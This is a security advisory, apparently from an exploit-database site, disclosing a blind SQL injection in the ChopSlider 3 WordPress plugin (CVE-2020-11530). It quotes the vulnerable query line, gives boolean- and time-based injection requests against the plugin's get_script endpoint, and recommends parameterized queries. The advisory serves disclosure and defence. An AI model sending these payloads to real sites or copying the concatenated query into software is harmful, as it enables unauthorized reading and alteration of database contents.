WordPress ChopSlider 3 SQL Injection

2020.05.11
Credit: Callum Murphy
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

---------------------------------------------------------------- ChopSlider3 Wordpress Plugin SQL Injection ---------------------------------------------------------------- [-] Software Link: https://idangero.us/ https://github.com/idangerous/Plugins [-] Affected Versions: ChopSlider version 3. [-] Vulnerability Description: A blind SQL injection vulnerability is present in Chop Slider 3, a Wordpress plugin. The vulnerability is introduced in 'chopslider/get_script/index.php', and allows an attacker to execute arbitrary SQL queries in the context of the WP database user. The offending code is located on line 13 of 'chopslider/get_script/index.php': $cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . ' WHERE chopslider_id =' . $id); Example injection string: GET /wp-content/plugins/chopslider/get_script/?id=141217078 or 6702=6702 (returns content-length 3055] GET /wp-content/plugins/chopslider/get_script/?id=141217078 or 6702=6703 (returns content-length 1229] Blind delay-based SQL injection: GET /wp-content/plugins/chopslider/get_script/?id=141217078 or (SELECT sleep(10))=6312 [delays for 10 seconds] [-] Solution: Use of prepared statements with parameterized queries will fix this vulnerability. [-] Disclosure Timeline: [03/04/2020] - Issue reported to vendor. No response was received. [04/04/2020] - CVE number assigned. [07/05/2020] - Publication of this advisory. [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2020-11530 to this vulnerability. [-] Credits: Vulnerability discovered by Callum Murphy.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top